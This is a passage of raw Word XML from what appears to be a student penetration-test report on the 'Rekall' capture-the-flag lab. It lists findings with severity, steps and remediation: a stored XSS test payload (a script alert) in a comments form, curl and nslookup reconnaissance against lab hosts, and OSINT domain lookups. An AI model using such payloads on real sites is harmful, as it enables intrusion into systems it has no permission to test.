            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">WAF</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(Web Application Firewalls) which tricks the web app. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">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drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2286000"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="27"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6577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0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4181475" cy="1962150"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="49"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4181475" cy="196215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1">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VR planner.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation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HTML </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="1f2328"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitization</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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9">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XSS stored vulnerability-Comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015B">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5D">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5F">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As i navigated from the welcome page and clicked on Leave a comment, i used the script &lt;script&gt;alert(“hello”)&lt;/script)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000161">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drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="3594100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="38"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657725" cy="3594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3">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Totalrekall.xyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation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t xml:space="preserve">Keep employees updated and trained on identifying phishing emails</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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169">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 4</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">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B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">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6E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">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70">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">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72">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In the Linux command line I ran the command curl -v </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://192.168.14.35/About-Rekall.php</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> to allow the HTTP to request from the command, show detailed information about the connection process, and to attach the URL that's being requested.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">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74">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="26797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657725" cy="26797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75">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176">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">About-Rekall.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">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178">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Comments in curl output cannot be removed</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jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qznd1rrjwtrb" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vslv1dxf6xi1" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Findings Day 2</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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12"/>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rHeight w:val="705" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000180">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000181">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="41"/>
                <w:szCs w:val="41"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:sz w:val="41"/>
                <w:szCs w:val="41"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000183">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Open Source Exposed Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000184">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85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Web App</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">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87">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">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89">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">From the </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">https://osintframework.com/</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> i navigated through Domain Name, WhoIS Records, and lastly to Domain Dossier. From there it took me to the Domain Dossier and I searched totalrekall.xyz in the domain search and I scanned through until I saw Flag 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A">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8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="25146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6577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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4476750" cy="1952625"/>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476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rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="3295650" cy="100965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95650" cy="100965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E">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18F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">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191">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove sensitive data from the server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>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193">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 2</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000194">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95">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Pinging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">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98">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">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9A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">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9C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">From Kali, I ran the command nslookup totalrekall.xyz to see the ip address of the website </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. From there I ran the command nslookup -type=TXT </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">. This command started a DNS lookup to specifically look for TXT records on the domain totalrekall.xyz and it gave me the flag 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019D">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9E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr/>
              <w:drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="20955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57725" cy="20955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9F">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1A0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">totalrekall.xyz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A1">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1A2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Try to hide the ip address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0070c0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>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1A5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A6">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7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A8">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
